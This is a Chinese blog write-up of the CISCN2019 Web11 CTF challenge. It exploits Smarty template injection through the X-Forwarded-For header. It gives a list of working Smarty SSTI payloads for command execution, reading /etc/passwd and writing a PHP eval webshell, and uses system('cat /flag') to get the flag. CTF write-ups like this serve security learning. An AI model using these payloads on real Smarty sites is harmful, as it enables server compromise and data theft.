[CISCN2019 华东南赛区]Web11 1

最新推荐文章于 2024-07-27 16:10:20 发布
最新推荐文章于 2024-07-27 16:10:20 发布
阅读量152 收藏
点赞数 1
文章标签: ssti 安全 经验分享 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53460654/article/details/117996068
版权

打开环境
在这里插入图片描述
右上角有ip地址
提示中有xff
在这里插入图片描述

我就猜想会不会存在模板注入
这里给一些smarty积累的payload

{system('cat /flag')}
{self::getStreamVariable("file:///etc/passwd")}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php eval($_GET['cmd']); ?>",self::clearConfig())}
常规利用
{$smarty.version}  #获取smarty的版本号
{php}phpinfo();{/php}  #执行相应的php代码
<script language="php">phpinfo();</script>
{self::getStreamVariable("file:///etc/passwd")}
{if phpinfo()}{/if}
{if system('ls')}{/if}

bp试试 用积累的payload:{if phpinfo()}{/if}
成功打通
在这里插入图片描述
所以直接流程

{if system('ls')}{/if}

在这里插入图片描述

{if system('ls /')}{/if}

在这里插入图片描述

{if system('cat /flag')}{/if}

在这里插入图片描述
得到flag
希望这篇文章能够帮助你!

M1kael
关注
[CISCN2019 华东赛区]Web11 1(SSTI,smarty,X-Forwarded-For)
weixin_45577185的博客
10-16 454
知识点: SSTI smarty X-Forwarded-For Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示 (HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多 文章往往只是一笔带过,讲解的重心往往在flask等框架上。 看到这个我就想到了抓包修改XFF试试加入X-Forwarded-For 发现Current IP更改为相应值 回想到曾经做过的题,用SSTI 发现存在注入 获取当前目录有那些文件:X-Forwarded-For:{system(‘ls’)}
[CISCN2019 华东赛区]Web2
qq_42551635的博客
05-13 470
[CISCN2019 华东赛区]Web2 前言 特别好的一道题,做完神清气爽,学到好多东西 知识点 xss 攻击获取cookie buu攻击平台 利用 cookie 获取管理员权限 获取到管理员cookie后,利用控制台中的application模块,修改页面cookie md5验证码哈希 import hashlib def func(md5_val): for x in range(999999, 100000000): md5_value=hashlib.md5(str(x
[CISCN2019 华东赛区]Web11
最新发布
weixin_73399382的博客
07-27 706
进来先做信息收集,右上角显示当前ip,然后有api的调用地址和请求包的格式以及最重要的是最下面的smarty模版,一看到这个就得想到smarty模版注入测试了一下两个api都无法访问直接切到数据包看看能不能通过XFF来修改右上角ip成功修改!结合给的信息smarty模版来看这道题应该是在XFF这里进行模版注入。
BUUCTF:[CISCN2019 华东赛区]Web4 ---- jwt的加密,解密 复习 ---- 一个奇怪的 jwt 的secret方法
Zero_Adam的博客
04-19 924
目录:一、自己做:1.没有思路啦,,2.没有思路啦,,二、学到的&&不足:三、学习WP 一、自己做: **注:**没有思路的地方,就是我看WP的地方。 解解jwt瞅瞅, 有加密的东西,我目前遇到过的jwt解法:弱密钥碰撞,碰撞出密钥来,就可以修改数据了,二:无密钥检测,用python重写一个无验证的jwt,有可能也成功, 再是一个进阶的方法:如果是SA256不对称加密的化,我们没办法破解,但是可以用SH256加密的方法巴拉巴拉给弄出来,没遇到过题,然后懒,,没有细细研究, 我*???,我正
buuctf web [CISCN2019 华东赛区]Web11
qq_40327508的博客
03-11 733
buuctf web [CISCN2019 华东赛区]Web11 进入后页面是这样的 可以通过最低端发现是Smarty SSTI,又从右上角得知是通过ip注入 使用burp构造X-Forwarded-For开始注入 从返回14看出确实存在注入,接下来根据smarty手册返回版本号等 最后读取flag ...
BUUCTF-CISCN-华东赛区Web-XSS
迷风小白
09-11 4576
XSS 拿到题目出现如下界面 随便点击测试一下,发现需要注册登录,随即注册一个用户登录(admin用户不能注册) 发现有投稿和反馈这两个页面可以操作 结合标题再看看这两个页面,投稿页面是用来放XSS的,然后在反馈给管理员这样我们就能拿到管理员的cookie,因为这里是内网环境,所以只能去 http://xss.buuoj.cn 注册账号来接收cookie。 经过测试发现提交的内容部分会被转义...
BUUCTF-WEBCISCN2019 华东赛区Web11 1
qq_36410265的博客
02-08 333
其实打开这张页面,我并不知道这道题是什么类型。只好先用bp去请求这两个接口。请求xff的时候,我添加了 xff头,值为127.0.0.1。回显了127.0.0.1。我就猜到是模板注入题了,加上页面上的关键字。,Smarty模板注入题,找了几个payload,没什么过滤,直接就回显了。以为这道题跟ikun那道题一样,考的知识点很多,是我想得复杂了。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M1kael

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值